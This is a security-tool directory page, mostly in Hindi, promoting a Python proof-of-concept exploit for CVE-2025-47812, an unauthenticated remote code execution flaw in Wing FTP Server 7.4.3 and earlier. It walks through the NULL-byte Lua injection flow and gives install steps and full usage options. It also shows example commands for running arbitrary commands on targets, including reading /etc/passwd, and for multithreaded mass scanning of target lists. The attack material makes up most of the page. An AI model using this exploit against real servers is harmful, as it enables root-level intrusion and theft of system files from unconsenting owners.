Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-471812-POC — CVE-2025-47812 के लिए Python PoC, Wing FTP Server <= 7.4.3 में सेशन फ़ाइलों में NULL-byte Lua इंजेक्शन के ज़रिए बिना प्रमाणीकरण के RCE | Kitploit
उपकरण/GitHubGitHub/d3vn0mi/cve-2025-471812-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubd3vn0mi/cve-2025-471812-poc

CVE-2025-471812-POC

CVE-2025-47812 के लिए Python PoC, Wing FTP Server <= 7.4.3 में सेशन फ़ाइलों में NULL-byte Lua इंजेक्शन के ज़रिए बिना प्रमाणीकरण के RCE

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

root@kitploit:~
/ __ \|__  /  | / / | / / __ \/  |/  // _/

/ / / / /_ <| | / /| |/ / / / / /|/ / / / / // // /| |/ / | / // / / / /_/ / /// |/ |/ ___// //____/

CVE-2025-47812 — Wing FTP Server <= 7.4.3 बिना प्रमाणीकरण के RCE

CVE-2025-47812 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Wing FTP Server के 7.4.4 से पहले के संस्करणों में एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन कमजोरी है।

भेद्यता अवलोकन

फ़ील्डविवरण
CVECVE-2025-47812
प्रभावितWing FTP Server <= 7.4.3
प्रकारबिना प्रमाणीकरण के रिमोट कोड निष्पादन
विशेषाधिकारroot (Linux) / SYSTEM (Windows)
विक्रेताwftpserver.com
मूल लेखकSheikh Mohammad Hasan उर्फ 4m3rr0r
द्वारा संशोधितd3vn0mi

मूल कारण

Wing FTP Server का c_CheckUser() फ़ंक्शन प्रमाणीकरण उद्देश्यों के लिए उपयोगकर्ता नाम को NULL बाइट (%00) पर छोटा कर देता है, लेकिन पूरा अस्वच्छित उपयोगकर्ता नाम — NULL बाइट के बाद का सब कुछ सहित — एक Lua सत्र फ़ाइल में लिखा जाता है। जब /dir.html जैसे प्रमाणित एंडपॉइंट तक पहुँचा जाता है, तो सर्वर उस सत्र फ़ाइल को निष्पादित करता है, जिससे उन्नत विशेषाधिकारों के साथ इंजेक्ट किया गया Lua कोड ट्रिगर होता है।

शोषण प्रवाह

root@kitploit:~
1. POST /loginok.html
   username=anonymous%00]]<LUA_PAYLOAD>&password=

2. Server authenticates "anonymous" (truncated at NULL)
   but writes full payload into session file → returns UID cookie

3. GET /dir.html  (Cookie: UID=<extracted_uid>)
   Server loads session file → executes injected Lua → RCE

स्थापना

root@kitploit:~
git clone https://github.com/d3vn0mi/cve_2025_471812_poc.git
cd cve_2025_471812_poc
pip install requests

उपयोग

त्वरित भेद्यता जाँच

root@kitploit:~
python3 exploit.py -u http://TARGET

कमांड निष्पादित करें

root@kitploit:~
python3 exploit.py -u http://TARGET -c 'id'

फ़ाइल से कई लक्ष्यों को स्कैन करें

root@kitploit:~
python3 exploit.py -f targets.txt -o vulnerable.txt -t 8

पूर्ण विकल्प

root@kitploit:~
usage: exploit.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME]
                  [-P PASSWORD] [-v] [-o OUTPUT] [-l LOG_FILE]
                  [-t THREADS] [--timeout TIMEOUT] [--retries RETRIES]
                  [--no-verify]

target:
  -u, --url URL           Single target URL (e.g. http://192.168.134.130)
  -f, --file FILE         File containing target URLs (one per line, # comments allowed)

exploit options:
  -c, --command COMMAND   Command to execute on the remote server (enables verbose output)
  -U, --username USERNAME Username for the exploit payload (default: anonymous)
  -P, --password PASSWORD Password for the exploit payload (default: empty)

output:
  -v, --verbose           Enable verbose / debug logging
  -o, --output OUTPUT     Save vulnerable URLs to this file
  -l, --log-file LOG_FILE Write detailed log to this file

network:
  -t, --threads THREADS   Concurrent threads for multi-target scans (default: 1)
  --timeout TIMEOUT       HTTP request timeout in seconds (default: 15)
  --retries RETRIES       Number of retries on connection failure (default: 2)
  --no-verify             Disable SSL certificate verification

उदाहरण

root@kitploit:~
# Check a single target
python3 exploit.py -u http://192.168.1.10

# Run 'whoami' and see full output
python3 exploit.py -u http://192.168.1.10 -c 'whoami'

# Scan a list with 8 threads, log everything to a file
python3 exploit.py -f targets.txt -t 8 -l scan.log -o vuln.txt

# Use custom credentials with SSL verification disabled
python3 exploit.py -u https://10.0.0.5 -U admin -P secret -c 'cat /etc/passwd' --no-verify

# Verbose mode for debugging
python3 exploit.py -u http://192.168.1.10 -v

विशेषताएं

  • संरचित लॉगिंग — रंग-कोडित कंसोल आउटपुट (DEBUG/INFO/WARN/ERROR) + --log-file के माध्यम से वैकल्पिक फ़ाइल लॉगिंग
  • मल्टी-थ्रेडेड स्कैनिंग — बड़ी लक्ष्य सूचियों के लिए -t के साथ समानांतर लक्ष्य स्कैनिंग
  • बैकऑफ़ के साथ पुनर्प्रयास — नेटवर्क विफलताओं पर स्वचालित एक्सपोनेंशियल बैकऑफ़ (कॉन्फ़िगर करने योग्य --retries)
  • SSL लचीलापन — स्व-हस्ताक्षरित प्रमाणपत्रों के लिए --no-verify
  • बैच स्कैनिंग — लक्ष्य फ़ाइलें # टिप्पणियों और स्वचालित डिडुप्लिकेशन का समर्थन करती हैं
  • स्वच्छ आउटपुट — Vuln-चेक मोड एक सरल VULNERABLE/NOT VULNERABLE परिणाम देता है; -c पूर्ण कमांड आउटपुट दिखाता है

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है। इस उपकरण के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं हैं।

श्रेय

  • मूल एक्सप्लॉइट 4m3rr0r द्वारा
  • d3vn0mi द्वारा संशोधित और सुधारित
टूल डाउनलोड करें